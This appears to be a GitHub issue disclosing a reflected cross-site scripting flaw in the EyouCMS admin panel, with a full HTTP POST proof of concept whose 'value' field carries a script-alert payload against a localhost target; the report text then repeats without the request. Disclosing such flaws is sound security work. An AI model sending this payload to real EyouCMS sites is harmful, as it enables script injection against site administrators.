You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Background of Website Reflected Cross-Site Scripting
Influenced Version
<= 1.6.0-UTF8-SP1
Description
Background article attribute type changing with reflected-XSS in the post value "value" when the value contains non-integer char, this xss payload will be showed in error reporting message.
POC
POST /cms/eyoucms/login.php?m=admin&c=Index&a=changeTableVal&_ajax=1&lang=cn HTTP/1.1
Host: 127.0.0.1:80
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=ArchivesFlag&a=index&lang=cn
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_draft%26lang%3Dcn%26keywords%3Dfvg; workspaceParam=switch_map%7CIndex; ENV_IS_UPHTML=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
value=%BA0<script>alert(1)</script>&field=status&id_value=1&id_name=id&table=archives_flag
Screen Shoot
Reported by Srpopty, vulnerability discovered by using Corax.
The text was updated successfully, but these errors were encountered:
Background of Website Reflected Cross-Site Scripting
Influenced Version
<= 1.6.0-UTF8-SP1
Description
Background article attribute type changing with reflected-XSS in the post value "value" when the value contains non-integer char, this xss payload will be showed in error reporting message.
POC
Screen Shoot
The text was updated successfully, but these errors were encountered: